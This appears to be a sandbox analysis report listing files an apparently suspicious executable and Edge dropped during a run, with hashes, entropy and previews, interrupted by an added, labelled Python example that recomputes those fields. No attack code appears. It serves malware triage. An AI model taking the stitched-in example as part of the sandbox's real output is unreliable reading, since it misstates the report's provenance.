                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):47
                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):35
                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"forceServiceDetermination":false}
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):81
                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40
                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):57
                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):29
                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:topTraffic_638004170464094982
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):9
                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:uriCache_
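The Size (bytes), Entropy (8bit), Encrypted and hash fields in these records can be recomputed for a file recovered from the analysis VM, which is the quickest way to confirm that a file you hold is the artifact the report describes. The following is an added example, not Joe Sandbox code and not part of the report: it takes the two small SmartScreen cache files whose complete content appears in the previews above (the 40-byte synchronousLookupUris_... string and the 9-byte uriCache_ string), plus a constructed uniform-byte blob, computes the same fields, and lists which quoted report values disagree with the computed ones. The 7.9-bit Encrypted threshold is an assumption for illustration; the report's own rule is not documented on this page. The report's hash strings can be placed in the reported dict to check them as well.

```python
"""Recompute the per-file triage metadata a sandbox report prints
(size, 8-bit Shannon entropy, MD5/SHA-1/SHA-256/SHA-512) so a recovered
dropped file can be checked against the report offline.
Added example; not Joe Sandbox code."""
import hashlib
import math
from collections import Counter

# Assumed threshold, not the sandbox's documented rule: flag a buffer as
# probably encrypted/compressed when its byte entropy approaches 8 bits.
ENCRYPTED_ENTROPY_THRESHOLD = 7.9


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte over the 256-symbol byte alphabet."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe(data: bytes) -> dict:
    """Return the fields the report prints for one dropped file."""
    entropy = shannon_entropy_8bit(data)
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy,
        "Encrypted": entropy >= ENCRYPTED_ENTROPY_THRESHOLD,  # heuristic, see above
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def verify_against_report(data: bytes, reported: dict) -> list:
    """Compare computed fields with values quoted from a report.
    Returns the names of fields that disagree (empty list means a match).
    Floats are compared with a small tolerance, hashes case-insensitively."""
    computed = describe(data)
    mismatches = []
    for key, expected in reported.items():
        got = computed[key]
        if isinstance(expected, float):
            if abs(got - expected) > 1e-9:
                mismatches.append(key)
        elif isinstance(expected, str):
            if got.upper() != expected.upper():
                mismatches.append(key)
        elif got != expected:
            mismatches.append(key)
    return mismatches


# Sample inputs: the two short SmartScreen cache files whose whole content is
# visible in the report previews, plus a constructed blob of uniform bytes.
SAMPLE_LOOKUP = b"synchronousLookupUris_638343870221005468"   # 40 bytes
SAMPLE_URICACHE = b"uriCache_"                                # 9 bytes
SAMPLE_BLOB = bytes(range(256)) * 4  # constructed: every byte value 4 times

if __name__ == "__main__":
    for name, data in [("lookup", SAMPLE_LOOKUP),
                       ("uriCache", SAMPLE_URICACHE),
                       ("blob", SAMPLE_BLOB)]:
        print(name, describe(data))
    # Values quoted from the report for the 40-byte file.
    print(verify_against_report(SAMPLE_LOOKUP,
                                {"Size (bytes)": 40,
                                 "Entropy (8bit)": 4.346439344671015}))
```

With the 40-byte file the computed entropy reproduces the report's 4.346439344671015, and the 9-byte uriCache_ file (nine distinct bytes) gives log2(9) = 3.169925001442312 as listed; the uniform blob scores 8.0 and is flagged, matching how the 7.999-entropy files above carry Encrypted:true while the JSON preferences files do not.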
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):179
                                                                                                                                                                Entropy (8bit):5.017293032290951
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTJsR4n:YWLSGTt1o9LuLgfGBPAzkVj/T8l6i
                                                                                                                                                                MD5:4BB4FDE2964E956936D0B0DE09D0AB2A
                                                                                                                                                                SHA1:3FF74CF36FC480FD9460AC660EA41DA643DBD83D
                                                                                                                                                                SHA-256:63402D238C60917FF1F9B355428A25A2D962FDC0C2B07DC503BF5D48FB48F3E8
                                                                                                                                                                SHA-512:CA64BA4696C30E87153CF99AC322396EEE312CB108C7B30B338D794E0775ACB7F3CA0F2B5955FC8F5996BBDA508C83609412CA6224B711AF983C159992E4A64B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736530952120486}]}
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):86
                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                Entropy (8bit):6.0895246082333365
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4keTKKGf4SjtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynbt5b7VLyMV/YoskFoz
                                                                                                                                                                MD5:5D3FC00A427C3745E99806028763CEFB
                                                                                                                                                                SHA1:0F41F0C777E60428C2C1646D96F323E146CE3F7D
                                                                                                                                                                SHA-256:3CD580E4FA3F6B9DF2E7F0A914B7694095411A4B98CEA84406BD3C3525EEA345
                                                                                                                                                                SHA-512:BFFD852FF5924202A64E1C6DAA851976152CE62A30152FFA2CF278C8DF31C321EEEE66111A80DA6153E47BFAD9207BE5A7B9DA3EDE1F7C5D3E1DE110AB17926F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):45983
                                                                                                                                                                Entropy (8bit):6.087920565418126
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:UMkbJrT8IeQc5dayzKKGf4YMZPVajeQuuHXcQSfMCios7DRo+yM/42cRaLMos77:UMk1rT8H1aVMZ+H9Fos7VLyMV/YosH
                                                                                                                                                                MD5:AABD00AE30BEEADCE4D1B09609AA6978
                                                                                                                                                                SHA1:F4EBCD4477F1E9712A2423E29D299DC723EB3A8C
                                                                                                                                                                SHA-256:A97A550ACE913F84FA5EF18065BE2B29B42501A6D1709416C847E924356840AA
                                                                                                                                                                SHA-512:744669B473412716E31B21EA8543BB8EA79850E683E1889D80C7F6989E46FB301C286FDE50E36B43B16E5A02EFFEDC2B9B106CA3B6AD463FA66B0213ED379CAF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"06756165-738a-4eac-aa05-b3426f7d05eb"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                Entropy (8bit):3.857378170510866
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:uiTrlKxrgxGxl9Il8uTy3tp0mzvQ7bShRBH0eYq8vaAhyRd1rc:m3YQb0mDQ7MROJvaAEy
                                                                                                                                                                MD5:CCA068D01BF7FF6954A759F6510B1866
                                                                                                                                                                SHA1:F6A5696D1077A157581D1AA3572D9BB7DB3BA8DD
                                                                                                                                                                SHA-256:1266CDA6B8EA4EEF1169B2CFF64C40566652443767306ABD148118C03E3D090F
                                                                                                                                                                SHA-512:AA7D3F5A7F1FE1983F89D26042A74BE74F6DFABA3045244B505503B83473B80ADDDFCAE444C56E9738C5763848349FE1113EFFAE2B4CC0760A33A6B45B1906A4
                                                                                                                                                                Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"WipwWM+NHlbCDmsZp8SOsjhtFBs="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"gNJ6t6Ri2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA0yYZK8
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                Entropy (8bit):4.000081803892654
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:uiTrlKxEx2JxD9Il8uTyQV1aQp3npdZn1ryIc9+aJTCZmSHXvdYhrtB0NQ+AN3K6:8YVv3nTZnxGPQlfG/+AN3K3XGC/W
                                                                                                                                                                MD5:0035AD3D00E16C475D11C3FFC7B58257
                                                                                                                                                                SHA1:16DCACFE5CC0610752877B88D7756B4BF3BE79B0
                                                                                                                                                                SHA-256:F4454DC10C306A662E7F34643489C9B2D2A4D89704256A67351E37FA8C48EA52
                                                                                                                                                                SHA-512:C76DD673708804E816130A5286FB1E7E5EF54E0C88A6004132EB1C9CB9EDA972221FDA7569E9786FAA3BBD218F4B998A931D250B00F7C88204E8851054A0CAF5
                                                                                                                                                                Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"z3UTqTb37/uzhiflb40fzhDrEsw="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"lijnnJxi2wE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AwAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA0yYZK8
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                Entropy (8bit):3.91398112739423
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7xcbxl9Il8uTyvCN0NYRBRT53dtpGPQKeT+YnglRd/vc:a8YdN0NgRt3dDd1T/glA
                                                                                                                                                                MD5:E94B70E23FF54C9DA2B00F8A7EE8D18A
                                                                                                                                                                SHA1:4532A45BEA1340E7D815DC25720CBF077B57F4F9
                                                                                                                                                                SHA-256:FCA0F808D3B4788C8C5550131FA94339560B40D611BD06222DD185AE8A54D1C1
                                                                                                                                                                SHA-512:218E7B3231162F73FFEE394C5611FE3BB642B82F60552048C0FCDD11E75E5B7A14D5A7E9E7C208B143C08975C4C61A5DF8D881D384019D1F47C0286B9B3FD510
                                                                                                                                                                Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"6N3Uy9nAUEqs5u96E/og0E/VJAg="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"sSjdzW2B3AE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA0yYZK8
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.
                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):5622661
                                                                                                                                                                Entropy (8bit):7.712440406758562
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:TdcsjAcC3kmUPeLv6p5DBkkIKBHB3D4CW0a+Tl3rRhNCMeN:xcxcC3YW769eKBSyV51C9
                                                                                                                                                                MD5:BB0FCBB4457157A536B2F02B3C7D759D
                                                                                                                                                                SHA1:AFA4F808E8CF6749782FBAFB5C7459E105A2E529
                                                                                                                                                                SHA-256:91F53082C94277B434A1D442BC154034747486E7B77EE4EC20C29961683AC487
                                                                                                                                                                SHA-512:133D67D8029533548ECEB69C21C8E747ED130D3420AB8DDBB007CACFA542B817EF0F34409DD43F5EE546F623286DEC97693C827495DBD65D6669579875499562
                                                                                                                                                                Malicious:false
Preview:{..==..'1..z.......9;..&5..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..zn..di..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^..T^
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                Entropy (8bit):7.951995436832936
